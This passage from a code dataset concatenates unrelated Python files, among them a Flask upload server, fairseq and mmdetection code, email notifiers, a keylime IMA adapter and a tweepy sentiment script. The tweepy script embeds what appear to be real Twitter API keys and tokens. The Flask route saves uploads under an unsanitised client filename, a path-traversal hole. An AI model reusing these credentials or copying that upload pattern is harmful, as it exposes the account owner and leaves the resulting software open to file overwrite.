res.append('{}:{:0>2}'.format(h, m))\n\n return res\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n print(solution.readBinaryWatch(1))\n","sub_path":"python/bit-manipulation/binary-watch.py","file_name":"binary-watch.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"14032878","text":"from flask import Flask\nfrom flask.ext.cors import CORS, cross_origin\nfrom flask import jsonify\nfrom flask import request\nimport json\nimport os\nimport binascii\nimport cv2\n\n\napp = Flask(__name__)\nUPLOAD_FOLDER = os.path.basename('uploads')\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'application/json'\n\n@app.route('/translate',methods = ['post'])\ndef hello():\n print(request.get_data())\n return jsonify(\"MeFFTUFCUJGYucoup\")\n\n\n@app.route('/upload',methods = ['post'])\ndef ocr():\n print(request.get_data())\n print(request.files)\n file = request.files['myFile']\n print(file)\n f = os.path.join(app.config['UPLOAD_FOLDER'], file.filename)\n file.save(f)\n \n return jsonify(\"Merci beaucoup\")\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', threaded=False)\n #app.run()\n","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"250907833","text":"#!/usr/bin/env python\nimport os\nimport re\n\nfrom setuptools import setup, find_packages\n\nversion_re = r'^__version__ = [\"\\']([^\"\\']*)[\"\\']$'\nauthor_re = r'^__author__ = [\"\\'](.*)[\"\\']$'\n\nINIT = open(os.path.join('gpucrate', '__init__.py')).read()\nversion = re.search(version_re, INIT, re.M).group(1)\nauthor = re.search(author_re, INIT, re.M).group(1)\n\nREADME = open('README.md').read()\n\nsetup(\n name='gpucrate',\n version=version,\n packages=find_packages(),\n author=author,\n url=\"https://github.com/jtriley/gpucrate\",\n description=(\"gpucrate creates hard-linked GPU driver volumes \"\n \"for use with docker, singularity, etc.\"),\n long_description=README,\n install_requires=[\n \"sh>=1.11\",\n \"nvidia-ml-py>=7.352.0\",\n \"PyYAML>=3.11\",\n ],\n setup_requires=[\n 'pytest-runner>=2.9'\n ],\n tests_require=[\n \"pytest>=3.0.3\",\n \"pytest-cov>=2.4.0\",\n \"pytest-flake8>=0.7\",\n \"testfixtures>=4.10.0\",\n \"mock>=2.0.0\",\n ],\n entry_points=dict(console_scripts=[\n 'gpucrate = gpucrate.cli:main',\n 'singularity-gpu = gpucrate.cli:singularity_gpu',\n ]),\n include_package_data=True,\n package_data={\n 'gpucrate.tests': ['data/*.txt'],\n },\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"205632006","text":"# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport math\n\nimport torch\nimport torch.nn.functional as F\n\nfrom fairseq import utils\n\nfrom fairseq.criterions import FairseqCriterion, register_criterion \n\n@register_criterion('ngram_language_loss')\nclass NgramLmLoss(FairseqCriterion):\n \"\"\"\n Implementation for the loss used in masked language model (MLM) training.\n \"\"\"\n\n def __init__(self, args, task):\n super().__init__(args, task)\n self.eps = args.label_smoothing\n self.disable_ngram_loss = args.disable_ngram_loss\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add criterion-specific arguments to the parser.\"\"\"\n # fmt: off\n parser.add_argument('--label-smoothing', default=0., type=float, metavar='D',\n help='epsilon for label smoothing, 0 means no label smoothing')\n parser.add_argument('--disable-ngram-loss', action='store_true',\n help='only comput basic stat')\n # fmt: on\n\n def forward(self, model, sample, reduce=True):\n \"\"\"Compute the loss for the given sample.\n Returns a tuple with three elements:\n 1) the loss\n 2) the sample size, which is used as the denominator for the gradient\n 3) logging outputs to display while training\n \"\"\"\n # compute MLM loss\n logits_list = model(**sample['net_input'], return_all_hiddens=False)[0]\n targets = model.get_targets(sample, [logits_list[0]])\n\n\n ngram = len(logits_list)\n # [B, ngram, T]\n expend_targets = targets.new_zeros(ngram, targets.size(0), targets.size(1)).fill_(self.padding_idx)\n for i in range(ngram):\n if i > 0 and self.disable_ngram_loss:\n break\n\n padding_targets = torch.zeros_like(targets).fill_(self.padding_idx)\n if 'target_idx' in sample:\n expend_targets[i,:,:] = torch.where(sample['target_idx'] >= i, targets, padding_targets)\n else:\n expend_targets[i,:,:] = targets\n targets = expend_targets\n\n logits = torch.cat(logits_list, dim=0) #.view(ngram, *logits_list[0].size())\n\n lprobs = F.log_softmax(\n logits.view(-1, logits.size(-1)),\n dim=-1,\n dtype=torch.float32,\n )\n\n loss = F.nll_loss(\n lprobs,\n targets.view(-1),\n reduction='sum',\n ignore_index=self.padding_idx,\n )\n\n if self.eps > 0.:\n smooth_loss = -lprobs.sum(dim=-1, keepdim=True)\n non_pad_mask = targets.ne(self.padding_idx).view(-1)\n smooth_loss = smooth_loss[non_pad_mask]\n smooth_loss = smooth_loss.sum()\n\n eps_i = self.eps / lprobs.size(-1)\n loss = (1. - self.eps) * loss + eps_i * smooth_loss\n\n sample_size = targets.ne(self.padding_idx).int().sum().item()\n\n logging_output = {\n 'loss': utils.item(loss.data) if reduce else loss.data,\n 'ntokens': sample['ntokens'],\n 'nsentences': sample['nsentences'],\n 'sample_size': sample_size,\n }\n return loss, sample_size, logging_output\n\n @staticmethod\n def aggregate_logging_outputs(logging_outputs):\n \"\"\"Aggregate logging outputs from data parallel training.\"\"\"\n loss = sum(log.get('loss', 0) for log in logging_outputs)\n ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)\n nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)\n sample_size = sum(log.get('sample_size', 0) for log in logging_outputs)\n\n agg_output = {\n 'loss': loss / sample_size / math.log(2),\n 'ntokens': ntokens,\n 'nsentences': nsentences,\n 'sample_size': sample_size,\n }\n return agg_output\n","sub_path":"ProphetNet/ProphetNet_Dialog_Zh/prophetnet/ngram_criterions.py","file_name":"ngram_criterions.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"131541065","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\n\"\"\"\n异步通知处理器\n\"\"\"\nimport os, imp, json, re\nfrom common import db, conf, app\nfrom consts import *\nfrom core import *\nfrom db import *\nfrom interface import *\n\n\ndef getprocess_img(process_obj):\n formurl = conf.info.formurl % (process_obj.flow_id, process_obj.id)\n return get_pange_raw(formurl)\n\n\ndef getcnname(username):\n try:\n uinfo = OA.user_info({'username': username})\n return uinfo['cn_name']\n except BaseException as e:\n return username\n\n\n##审批或者驳回通知用户\n@Event.register(\"notice_user\")\ndef notice_user(pro_id, log_type, executor, msg):\n try:\n self = ZProcess.weakup(pro_id)\n _tm = {\n LOG_PROCESS_COMMIT: u\"审批\",\n LOG_PROCESS_REJECT: u\"驳回\",\n LOG_PROCESS_REMARK: u\"回复\"\n }\n process = self.wf_process\n\n node = self.load_node()\n node_name = node.name\n remind = 1\n title = u\"[工单系统:%s%s]\" % (_tm[log_type], process.process_name)\n phonemsg = u\"[%s工单][%s][%s]\" % (_tm[log_type], process.process_name, node_name)\n\n executorInfo = OA.user_info({'username': executor})\n if type(executorInfo) == dict:\n executorInfo = executorInfo.get('cn_name', executor)\n else:\n executorInfo = executor\n formurl = conf.info.formurl % (process.flow_id, process.id)\n html = u\"\"\"\n \n

\n

当前流程步骤:%s

\n

执行人:%s\\n

\n

%s:%s

\n

时间:%s

\n \n \n \"\"\" % (node_name, executorInfo, _tm[log_type], msg, gettime())\n\n user_name = process.user_name\n process.remark = msg\n\n email = \"%s@example.com\" % user_name\n\n pngraw = get_pange_raw(formurl, {'id': process.id})\n\n feedback_mail = self.wf_process.feedback\n if feedback_mail:\n email = feedback_mail\n\n Mail.SendImages(email, title, html, [('form.png', pngraw)])\n self.logger(LOG_PROECSS_SEND_MAIL, executor, \"处理邮件回复\", b\"\\n\".join([title, html]))\n app.logger.info(\"Send mail for commit user.\\nuser mail title:%s\\nmail cut picture url:%s\" % (title, formurl))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_user\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##通知待处理人处理工单\n@Event.register(\"notice_executor\")\ndef notice_executor(pro_id):\n try:\n self = ZProcess.weakup(pro_id)\n process = self.wf_process\n node = self.load_node()\n remind = 1\n\n process_User_Info = OA.user_info({'username': process.user_name})\n title = u\"[你有新的工单]--%s--%s\" % (process.flow_name, process.process_name)\n try:\n post_cn_name = process_User_Info['cn_name']\n except BaseException as e:\n post_cn_name = process.user_name\n\n commit_url = conf.info.ucommit % process.id\n\n html = u\"\"\"\n \n

\n

当前步骤:%s

\n

提交人:%s

\n

步骤开始时间:%s

\n

点击跳转到审批页面

\n \n \n \"\"\" % (node.name, post_cn_name, str(process.update_time), commit_url)\n ulist = list(set(process.candidate.split(\",\")))\n maillist = \";\".join([\"%s@example.com\" % name for name in ulist])\n\n formurl = conf.info.formurl % (process.flow_id, process.id)\n pngraw = get_pange_raw(formurl, {'id': process.id})\n\n Mail.SendImages(maillist, title, html, [('form.png', pngraw)])\n self.logger(LOG_PROECSS_SEND_MAIL, \"system\", \"步骤邮件通知\", b\"\\n\".join([maillist, title, html]))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_executor\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##发送消息给审批人\n@Event.register(\"notice_sendmsg\")\ndef notice_sendmsg(pro_id, msg):\n try:\n self = ZProcess.weakup(pro_id)\n process = self.wf_process\n node = self.load_node()\n remind = 1\n\n process_User_Info = OA.user_info({'username': process.user_name})\n title = u\"[提单人消息]--%s--%s\" % (process.flow_name, process.process_name)\n try:\n post_cn_name = process_User_Info['cn_name']\n except BaseException as e:\n post_cn_name = process.user_name\n\n commit_url = conf.info.ucommit % process.id\n\n html = u\"\"\"\n \n

\n

当前步骤:%s

\n

发送消息给审批人:%s

\n

点击跳转到审批页面

\n \n \n \"\"\" % (node.name, msg, commit_url)\n ulist = list(set(process.candidate.split(\",\")))\n maillist = \";\".join([\"%s@example.com\" % name for name in ulist])\n\n formurl = conf.info.formurl % (process.flow_id, process.id)\n pngraw = get_pange_raw(formurl, {'id': process.id})\n Mail.SendImages(maillist, title, html, [('form.png', pngraw)])\n\n # for recver in node.candidate():\n # if FLAG_SMS & remind:\n # SMS.Send(UserInfo['mobile'],phonemsg)\n # self.logger(LOG_PROECSS_SEND_MAIL,\"system\",\"步骤短信通知\",b\"\\n\".join([title,phonemsg]))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_executor\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##驳回通知\n@Event.register(\"notice_reject\")\ndef notice_reject(pro_id, executor, msg):\n try:\n self = ZProcess.weakup(pro_id)\n process = self.wf_process\n node = self.load_node()\n\n commit_name = getcnname(process.user_name)\n executor_name = getcnname(executor)\n\n title = u\"[工单驳回]--%s--%s\" % (process.flow_name, process.process_name)\n html = u\"\"\"\n \n

\n

步骤:%s

\n

提单人:%s

\n

驳回人:%s

\n

回复:%s

\n \n \n \"\"\" % (node.name, commit_name, executor_name, msg)\n\n qlist = db.session.query(ProcessLog).filter_by(process_id=process.id, type=LOG_PROCESS_COMMIT).all()\n executor_list = [record.operation_user_ad for record in qlist]\n executor_list += [executor]\n\n maillist = [u\"%s@example.com\" % name for name in executor_list]\n maillist += [u\"%s@example.com\" % process.user_name]\n if process.feedback:\n flist = re.split(r\"[,;]\", process.feedback)\n maillist += [u\"%s\" % mail for mail in flist]\n\n maillist = [mail.strip() for mail in maillist]\n maillist = list(set(maillist))\n maillist = u\";\".join(maillist)\n\n pngraw = getprocess_img(process)\n\n Mail.SendImages(maillist, title, html, [('form.png', pngraw)])\n self.logger(LOG_PROECSS_SEND_MAIL, \"system\", u\"驳回通知\", b\"\\n\".join([maillist, title, html]))\n app.logger.info(\"notice_reject title %s maillist %s\" % (title, maillist))\n except BaseException as e:\n app.logger.error(\"ZProcess::notice_executor\\n%s\\n%s\" % (GetException(), e))\n return ERROR\n finally:\n db.session.remove()\n return OK\n\n\n##发送简单邮件\n@Event.register(\"notice_mail\")\ndef NoticeDev(to, title, content):\n Mail.Send(to, title, content)\n app.logger.info(\"send notice_mail %s\" % to)\n","sub_path":"server/observer/async_notice.py","file_name":"async_notice.py","file_ext":"py","file_size_in_byte":7761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"167643982","text":"model = dict(\n type='ATSS',\n backbone=dict(\n type='SwinTransformer',\n embed_dims=192,\n depths=[2, 2, 18, 2],\n num_heads=[6, 12, 24, 48],\n window_size=7,\n mlp_ratio=4,\n qkv_bias=True,\n qk_scale=None,\n drop_rate=0.0,\n attn_drop_rate=0.0,\n drop_path_rate=0.2,\n patch_norm=True,\n out_indices=(0, 1, 2, 3),\n with_cp=False,\n convert_weights=True,\n init_cfg=dict(\n type='Pretrained',\n checkpoint=\n 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth'\n )),\n neck=dict(\n type='FPN',\n in_channels=[192, 384, 768, 1536],\n out_channels=256,\n start_level=1,\n add_extra_convs='on_output',\n num_outs=5),\n bbox_head=dict(\n type='ATSSHead',\n num_classes=4,\n in_channels=256,\n stacked_convs=4,\n feat_channels=256,\n anchor_generator=dict(\n type='AnchorGenerator',\n ratios=[1.0],\n octave_base_scale=8,\n scales_per_octave=1,\n strides=[8, 16, 32, 64, 128]),\n bbox_coder=dict(\n type='DeltaXYWHBBoxCoder',\n target_means=[0.0, 0.0, 0.0, 0.0],\n target_stds=[0.1, 0.1, 0.2, 0.2]),\n loss_cls=dict(\n type='FocalLoss',\n use_sigmoid=True,\n gamma=2.0,\n alpha=0.25,\n loss_weight=1.0),\n loss_bbox=dict(type='GIoULoss', loss_weight=2.0),\n loss_centerness=dict(\n type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0)),\n train_cfg=dict(\n assigner=dict(type='ATSSAssigner', topk=9),\n allowed_border=-1,\n pos_weight=-1,\n debug=False),\n test_cfg=dict(\n nms_pre=1000,\n min_bbox_size=0,\n score_thr=0.05,\n nms=dict(type='nms', iou_threshold=0.6),\n max_per_img=100))\ndataset_type = 'CocoDataset'\ndata_root = '../data_coco/'\nclasses = ('01_ulcer', '02_mass', '04_lymph', '05_bleeding')\nimg_norm_cfg = dict(\n mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)\ntrain_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='Resize',\n img_scale=[(512, 461), (512, 563)],\n multiscale_mode='range',\n keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n]\ntest_pipeline = [\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(512, 512),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img'])\n ])\n]\ndata = dict(\n samples_per_gpu=2,\n workers_per_gpu=2,\n train=dict(\n type='CocoDataset',\n ann_file='../data_coco/train_annotations.json',\n img_prefix='../data_coco/train',\n classes=('01_ulcer', '02_mass', '04_lymph', '05_bleeding'),\n pipeline=[\n dict(type='LoadImageFromFile'),\n dict(type='LoadAnnotations', with_bbox=True),\n dict(\n type='Resize',\n img_scale=[(512, 461), (512, 563)],\n multiscale_mode='range',\n keep_ratio=True),\n dict(type='RandomFlip', flip_ratio=0.5),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='DefaultFormatBundle'),\n dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels'])\n ]),\n val=dict(\n type='CocoDataset',\n ann_file='../data_coco/valid_annotations.json',\n img_prefix='../data_coco/valid',\n classes=('01_ulcer', '02_mass', '04_lymph', '05_bleeding'),\n pipeline=[\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(512, 512),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img'])\n ])\n ]),\n test=dict(\n type='CocoDataset',\n ann_file='../data_coco/valid_annotations.json',\n img_prefix='../data_coco/valid',\n classes=('01_ulcer', '02_mass', '04_lymph', '05_bleeding'),\n pipeline=[\n dict(type='LoadImageFromFile'),\n dict(\n type='MultiScaleFlipAug',\n img_scale=(512, 512),\n flip=False,\n transforms=[\n dict(type='Resize', keep_ratio=True),\n dict(type='RandomFlip'),\n dict(\n type='Normalize',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n to_rgb=True),\n dict(type='Pad', size_divisor=32),\n dict(type='ImageToTensor', keys=['img']),\n dict(type='Collect', keys=['img'])\n ])\n ]))\nevaluation = dict(interval=1, metric='bbox')\noptimizer = dict(\n type='AdamW',\n lr=0.0001,\n betas=(0.9, 0.999),\n weight_decay=0.05,\n paramwise_cfg=dict(\n custom_keys=dict(\n absolute_pos_embed=dict(decay_mult=0.0),\n relative_position_bias_table=dict(decay_mult=0.0),\n norm=dict(decay_mult=0.0))))\noptimizer_config = dict(grad_clip=None)\nlr_config = dict(\n policy='step',\n warmup='linear',\n warmup_iters=1000,\n warmup_ratio=0.001,\n step=[27, 33])\nrunner = dict(type='EpochBasedRunner', max_epochs=36)\ncheckpoint_config = dict(interval=1)\nlog_config = dict(\n interval=50, hooks=[dict(type='TextLoggerHook', interval=100)])\ncustom_hooks = [dict(type='NumClassCheckHook')]\ndist_params = dict(backend='nccl')\nlog_level = 'INFO'\nload_from = None\nresume_from = None\nworkflow = [('train', 1)]\npretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_large_patch4_window7_224_22k.pth'\nfind_unused_parameters = True\nwork_dir = 'ckpts/atss_swin-l_ms'\ngpu_ids = range(0, 1)\n","sub_path":"mmdetection/ckpts/atss_swin-l_ms/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":7284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"551531447","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 23 12:53:38 2020\r\n\r\n@author: Adjecti-1\r\n\"\"\"\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# importing the dataset\r\ndataset = pd.read_csv('Position_Salaries.csv')\r\nX = dataset.iloc[:, 1:-1].values # iloc indecates locate indexes\r\ny = dataset.iloc[:, -1].values\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX = sc_X.fit_transform(X)\r\nsc_y = StandardScaler()\r\ny = y.reshape(len(y), 1)\r\ny = sc_y.fit_transform(y)\r\n\r\n# Creating and Training the regressor\r\nfrom sklearn.svm import SVR\r\nregressor = SVR(kernel='rbf')\r\nregressor.fit(X, y)\r\ny_pred = sc_y.inverse_transform(regressor.predict(sc_X.transform([[6.5]])))\r\n\r\n# Visualizing the data\r\nplt.scatter(sc_X.inverse_transform(X), sc_y.inverse_transform(y), color=\"red\")\r\nplt.plot(sc_X.inverse_transform(X), sc_y.inverse_transform(regressor.predict(X)), color=\"blue\")\r\nplt.xlabel(\"Position Levels\")\r\nplt.ylabel(\"Salary\")\r\nplt.title(\"Truth or Bluf\")\r\nplt.show()\r\n","sub_path":"Machine-Learning/data-sets/Part 2 - Regression/Section 7 - Support Vector Regression (SVR)/prcts/SVR.py","file_name":"SVR.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"233917389","text":"\ndef doMove(ptr, direction):\n dirs = {\n 'L':[0,-1],\n 'R':[0, 1],\n 'D':[1,-1],\n 'U':[1, 1]\n }\n\n i, k = dirs[direction]\n ptr[i] += k\n return ptr\n\nwith open('input') as text:\n mem = {}\n commands = []\n for i, line in enumerate(text.readlines()):\n # for i, line in enumerate(['R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51','U98,R91,D20,R16,D67,R40,U7,R15,U6,R7']):\n ptr = [0, 0]\n moves = line.split(',')\n step_counter = 0\n for move in moves:\n for _ in range(int(move[1:])):\n ptr = doMove(ptr, move[0])\n step_counter += 1\n key = tuple(ptr)\n if key in mem:\n if mem[key][0] != i:\n mem[key][0] = 2\n mem[key][1] += step_counter\n # else:\n # step_counter = mem[key][1]\n else:\n mem[key] = [i, step_counter]\n \n cptr = False\n min_steps = False\n for k, v in mem.items():\n if v[0] == 2:\n print(k, v)\n manhattan = abs(k[0]) + abs(k[1])\n cptr = manhattan if not cptr else min(manhattan, cptr)\n min_steps = v[1] if not min_steps else min(v[1], min_steps)\n \n print('Part 1:', cptr)\n print('Part 2:', min_steps)\n","sub_path":"03/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"428486898","text":"\"\"\"\nOperatory\n\nUzupełnij kod tak, aby wykonywał określone zadania\n\"\"\"\n\n# złóż zdanie z podanej listy słów\nwords = ['Ala', 'ma', 'kota', 'a', 'kot', 'ma', 'Alę']\n\n\n# dodaj brakujące słowo (operując na liście) oraz\n# odwróć kolejność słów (nie znaków) w podanym zdaniu\nsentance = 'Ala ma kota a kot ma'\n\n\n# uporządkuj liczby w danej liście w kolejności\n# rosnącej\nnumbers = [100, 12, -52.3, 57, 1, -40, 0, 74]\n\n\n# uporządkuj liczby w danej liście w kolejności\n# rosnącej według wartości bezwzględnej\nnumbers_abs = [100, 12, -52.3, 57, 1, -40, 0, 74]\n\n\n# dana jest lista ze zwierzętami, zmodyfikuj listę\n# tak, aby zawierała jedynie zwierzęta domowe\npets = ['cat', 'snake', 'doge', 'llama', 'hamster']\n","sub_path":"rozdzial1/live_coding/ex06.py","file_name":"ex06.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"526999248","text":"# # textblob \n# new1=Textblob(\"random text here\")\n# new1.tags returns the type of speech\n# new1.words tokenizez the tags\n# new1.sentiment.polarity gives sentiment -1 to 1 from sad to happy\n\nimport csv\nimport tweepy\nfrom textblob import TextBlob\n\nconsumer_key= '8LMIGPdNKwPMasLeUIWpVSY15'\nconsumer_secret= 'MbQGzudmi6qlGaSEap7FdRQSQkEIT2d5nIn20MuUQn209CnON8'\n\naccess_token='959668567401615360-8GHTVoWrTCyf0VGUJABZi5gmCWvWYUG'\naccess_token_secret='zTqWKZLvFEZMkN9GO2fbLN1TPESnbUF8vcEte7iAXWrsw'\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\ntwitter = tweepy.API(auth)\n\ntweets = twitter.search('game of thrones')\n\n\n\nwith open('p2sentiment.csv', 'w', newline='') as csvfile:\n\tout = csv.writer(csvfile, delimiter=' ',quotechar='|', quoting=csv.QUOTE_MINIMAL)\n\tfor tweet in tweets:\n\t\tprint(tweet.text)\n\t\tanalysis = TextBlob(tweet.text)\n\t\tout.writerow(analysis.sentiment)\n\t\t#out.write('\\n')\n\t\tprint(analysis.sentiment)\n\t\tprint(\"\")\n\n\n#polarity - how positive or negative the tweet is\n#subjectivity - how much opininon it is vs how much factual\n\n \t\n \t\n \t\n \t\n \t","sub_path":"Sentiment Analysis using Tweepy/p2_sklearn.py","file_name":"p2_sklearn.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"222786755","text":"#!/usr/bin/python3\n'''\nSPDX-License-Identifier: Apache-2.0\nCopyright 2017 Massachusetts Institute of Technology.\n'''\n\nimport sys\nimport select\nimport time\nimport itertools\n\nfrom keylime.tpm.tpm_abstract import config, hashlib\nfrom keylime.tpm import tpm_obj\nfrom keylime.common import algorithms\n\n# get the tpm object\ntpm = tpm_obj.getTPM(need_hw_tpm=True)\n\nstart_hash = ('0000000000000000000000000000000000000000')\nff_hash = ('ffffffffffffffffffffffffffffffffffffffff')\n\n\ndef ml_extend(ml, position, searchHash=None):\n global start_hash\n f = open(ml, 'r')\n lines = itertools.islice(f, position, None)\n\n for line in lines:\n line = line.strip()\n tokens = line.split()\n\n if line == '':\n continue\n if len(tokens) < 5:\n print(\"ERROR: invalid measurement list file line: -%s-\" % (line))\n return position\n position += 1\n\n # get the filename roughly\n path = str(line[line.rfind(tokens[3]) + len(tokens[3]) + 1:])\n template_hash = tokens[1]\n\n # this is some IMA weirdness\n if template_hash == start_hash:\n template_hash = ff_hash\n\n if searchHash is None:\n print(\"extending hash %s for %s\" % (template_hash, path))\n # TODO: Add support for other hash algorithms\n tpm.extendPCR(config.IMA_PCR, template_hash, algorithms.Hash.SHA1)\n else:\n # Let's only encode if its not a byte\n try:\n runninghash = start_hash.encode('utf-8')\n except AttributeError:\n pass\n # Let's only encode if its not a byte\n try:\n template_hash = template_hash.encode('utf-8')\n except AttributeError:\n pass\n\n runninghash = hashlib.sha1(runninghash + template_hash).digest()\n\n if runninghash == searchHash:\n print(\"Located last IMA file updated: %s\" % (path))\n return position\n\n if searchHash is not None:\n raise Exception(\n \"Unable to find current measurement list position, Resetting the TPM emulator may be neccesary\")\n\n return position\n\n\ndef main():\n if not tpm.is_emulator():\n raise Exception(\"This stub should only be used with a TPM emulator\")\n\n # initialize position in ML\n pos = 0\n\n # check if pcr is clean\n pcrval = tpm.readPCR(config.IMA_PCR, algorithms.Hash.SHA1)\n if pcrval != start_hash:\n print(\"Warning: IMA PCR is not empty, trying to find the last updated file in the measurement list...\")\n pos = ml_extend(config.IMA_ML, 0, pcrval)\n\n print(\"Monitoring %s\" % (config.IMA_ML))\n poll_object = select.poll()\n fd_object = open(config.IMA_ML, \"r\")\n number = fd_object.fileno()\n poll_object.register(fd_object, select.POLLIN | select.POLLPRI)\n\n while True:\n results = poll_object.poll()\n for result in results:\n if result[0] != number:\n continue\n pos = ml_extend(config.IMA_ML, pos)\n time.sleep(0.2)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"keylime/cmd/ima_emulator_adapter.py","file_name":"ima_emulator_adapter.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"188942527","text":"class Solution(object):\n def subarraySum(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n sumArray = []\n sumArray.append(0)\n \n for i in range(len(nums)):\n sumArray.append(sumArray[i]+nums[i])\n \n count={}\n result = 0\n for i in sumArray:\n if i-k in count:\n result+=count[i-k]\n if i in count:\n count[i]+=1\n else:\n count[i]=1\n \n \n return result","sub_path":"Python/Medium/560. Subarray Sum Equals K.py","file_name":"560. Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"128062262","text":"import math\n\ndef diag(mat):\n\n \"\"\"\n Diagonalization function in 2-dimension\\n\n # input requirement\\n\n mat: input matrix in 2-dimension, shape = (2, 2)\\n\n ***WARNING*** check if mat is in float data type!\\n\n # output description\\n\n [diag, U]\\n\n diag: diagonalized matrix\\n\n U: unitary operator\\n\n # Formula\\n\n mat = U·diag·U', where U' means transpose of U\n \"\"\"\n\n if abs(mat[0][0]-mat[1][1]) > 1E-5:\n theta = 0.5*math.atan(2*mat[0][1]/(mat[0][0]-mat[1][1]))\n else:\n theta = math.pi/4\n\n eigenVal1 = mat[0][0]*(math.cos(theta)**2) + mat[1][1]*(math.sin(theta)**2) + mat[0][1]*math.sin(2*theta)\n eigenVal2 = mat[0][0]*(math.sin(theta)**2) + mat[1][1]*(math.cos(theta)**2) - mat[0][1]*math.sin(2*theta)\n U = [[math.cos(theta), math.sin(theta)], [math.sin(theta), -math.cos(theta)]]\n diagMat = [[eigenVal1, 0.0], [0.0, eigenVal2]]\n\n return [diagMat, U]\n","sub_path":"hf/diag_so2.py","file_name":"diag_so2.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"488092388","text":"from collections import defaultdict\nfrom math import inf\nimport random\nimport csv\n\n\ndef point_avg(points):\n \"\"\"\n Accepts a list of 